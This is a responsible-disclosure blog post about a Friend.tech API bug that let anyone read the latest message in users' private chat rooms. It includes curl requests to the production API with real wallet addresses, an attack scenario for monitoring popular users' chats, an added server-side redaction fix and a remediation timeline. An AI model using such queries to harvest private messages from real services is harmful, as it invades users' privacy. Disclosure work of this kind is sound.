Chat Room Messages Leak on Friend.tech
Accessing the most recent message sent to each of the chat rooms a particular user is part of is open to anyone. Ownership of shares or even an account within the app is not required.
What is Friend.tech
According to CryptoPress:
Friend.tech is a new social app that allows users to tokenize their social network. In essence, people can sell “shares” of themselves, and these share owners can privately chat with the person they own shares in.
Bug description
While using the app, I initially routed its traffic through a web proxy to capture the HTTP communication and learn how the app works internally.
The API is located at the following URL:
https://prod-api.kosetto.com/
The wallets of the top users can be found on the platform by simply running the query below:
curl -ik "https://prod-api.kosetto.com/lists/top-by-price"
HTTP/2 200 OK
Date: Sun, 20 Aug 2023 08:23:15 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 17405
X-Powered-By: Express
Access-Control-Allow-Origin: https://www.friend.tech
Vary: Origin
Etag: W/"43fd-J0hFxxH9eT4QRgl9l2sMz90Xm0M"
{"users":[{"id":903,"address":"0x4e5f7e4a774bd30b9bdca7eb84ce3681a71676e1","twitterUsername":"cobie","twitterName":"Cobie","twitterPfpUrl":"https://pbs.twimg.com/profile_images/1688496375707701248/WwWz33DI.jpg","twitterUserId":"2259434528","lastOnline":1691761722180,"displayPrice":"2756250000000000000","holderCount":167,"shareSupply":214},{"id":304,"address":"0xecd55f15f1b1d5eb2d6627f69a2d93161b0c572d","twitterUsername":"0xSisyphus","twitterName":"Sisyphus","twitterPfpUrl":"https://pbs.twimg.com/profile_images/1444824208790392832/YqjYT0SD.png","twitterUserId":"1366930865574584323","lastOnline":1691761594422,"displayPrice":"2232562499999999700","holderCount":149,"shareSupply":189},
[...]
To query users, their wallet address is passed as a parameter in the URL, for example, like this:
curl -ik "https://prod-api.kosetto.com/users/0x4e5f7e4a774bd30b9bdca7eb84ce3681a71676e1"
HTTP/2 200
date: Sun, 20 Aug 2023 09:19:41 GMT
content-type: application/json; charset=utf-8
content-length: 381
x-powered-by: Express
vary: Origin
etag: W/"17d-8K13OARr6Sab18LK2Zmc2zrBMr0"
{"id":903,"address":"0x4e5f7e4a774bd30b9bdca7eb84ce3681a71676e1","twitterUsername":"cobie","twitterName":"Cobie","twitterPfpUrl":"https://pbs.twimg.com/profile_images/1688496375707701248/WwWz33DI.jpg","twitterUserId":"2259434528","lastOnline":1691761722180,"holderCount":165,"holdingCount":12,"shareSupply":212,"displayPrice":"2704000000000000000","lifetimeFeesCollectedInWei":"0"}
Clearly, the most interesting attack vector is gaining access to chat rooms without owning any shares in them. While browsing through a list of existing chats, I noticed the following endpoint that could be queried:
https://prod-api.kosetto.com/portfolio/<address>
It returned various information about the user's holdings. Surprisingly, it also included the last message, and its author, from each chat the queried user was in. Anyone who knows a user's address could send this query. I decided to try it on the top-ranked account at the time of writing - Cobie:
curl -s "https://prod-api.kosetto.com/portfolio/0x4e5f7e4a774bd30b9bdca7eb84ce3681a71676e1" | json_pp
Here's a section of the output that doesn't expose any sensitive information. In this portion, 'lastMessageName' refers to the author, while 'lastMessageText' contains the message content.
No authentication is necessary to access any user's portfolio. This implies that downloading messages is feasible not only for Friend.tech users, but for anyone who knows the user's wallet address - which is also publicly available on-chain.
Attack scenario
An illustrative real attack scenario could involve compiling a list of the most popular accounts through the 'lists/top-by-price' method. Subsequently, one could consistently track '/portfolio/<address>' and record all 'lastMessageName' and 'lastMessageText' values to intercept ongoing discussions in real time within these private groups. Certainly some interesting information could be gathered.
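The root cause is an authorization gap: the portfolio endpoint serialises chat previews for everyone, regardless of who is asking. The snippet below is an added example of what a server-side fix could look like; it is not Friend.tech's code and the portfolio shape, the holdings lookup and the req.user field are all assumptions (the page only shows the field names lastMessageName and lastMessageText and that the backend runs Express).

```javascript
// Added example, not Friend.tech's code. Assumed shape: a portfolio lists the
// subjects whose shares the queried user holds; each holding carries a chat
// preview (lastMessageName / lastMessageText) for that subject's room.

// Constructed sample of what the backend might hand the route before serialisation.
const SAMPLE_PORTFOLIO = {
  address: "0xaaaa000000000000000000000000000000000001", // constructed address
  holdings: [
    { subject: "0xbbbb000000000000000000000000000000000002", balance: 3,
      lastMessageName: "alice", lastMessageText: "see you at 9" },
    { subject: "0xcccc000000000000000000000000000000000003", balance: 1,
      lastMessageName: "bob", lastMessageText: "draft numbers attached" },
  ],
};

// Fields that must never reach a caller who is not a member of that room.
const CHAT_PREVIEW_FIELDS = ["lastMessageName", "lastMessageText"];

// A viewer (authenticated address, or null when anonymous) may see the preview
// of `subject`'s room only if they are that subject or hold its shares.
// `viewerHoldings` must come from a server-side lookup, never from the request.
function canSeeRoom(viewer, subject, viewerHoldings) {
  if (!viewer) return false;                                   // anonymous: never
  const s = subject.toLowerCase();
  if (viewer.toLowerCase() === s) return true;                 // room owner
  return viewerHoldings.some(h => h.subject.toLowerCase() === s && h.balance > 0);
}

// Return a copy of the portfolio with previews stripped from every room the
// viewer is not entitled to; the input object is left untouched.
function redactPortfolio(portfolio, viewer, viewerHoldings) {
  return {
    ...portfolio,
    holdings: portfolio.holdings.map(h => {
      const copy = { ...h };
      if (!canSeeRoom(viewer, h.subject, viewerHoldings)) {
        for (const f of CHAT_PREVIEW_FIELDS) delete copy[f];
      }
      return copy;
    }),
  };
}

// Express-style handler (hypothetical names). An upstream auth middleware is
// assumed to set req.user only after verifying a wallet signature.
function portfolioHandler(req, res, loadPortfolio, loadHoldings) {
  const viewer = req.user ? req.user.address : null;
  const viewerHoldings = viewer ? loadHoldings(viewer) : [];
  res.json(redactPortfolio(loadPortfolio(req.params.address), viewer, viewerHoldings));
}
```

Public fields such as holderCount or displayPrice still pass through unchanged, so the endpoint keeps working for anonymous callers while the chat previews are gated on membership.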
Fix
10:44 GMT+2 20 Aug 2023 - reached out to Friend.tech via Twitter
14:44 GMT+2 20 Aug 2023 - with the help of @0xfoobar contact was established
15:10 GMT+2 20 Aug 2023 - Friend.tech team deployed a fix
Conclusion
I advise anyone using the Friend.tech beta version not to share any sensitive information in such chats, especially during the beta stage when more bugs are likely to emerge. Besides the technical considerations, it's reasonable to assume that group chats may eventually be leaked by insiders anyway, although this is unrelated to technical aspects. The prompt and professional response of the team is also noteworthy, underscoring their strong commitment to platform security.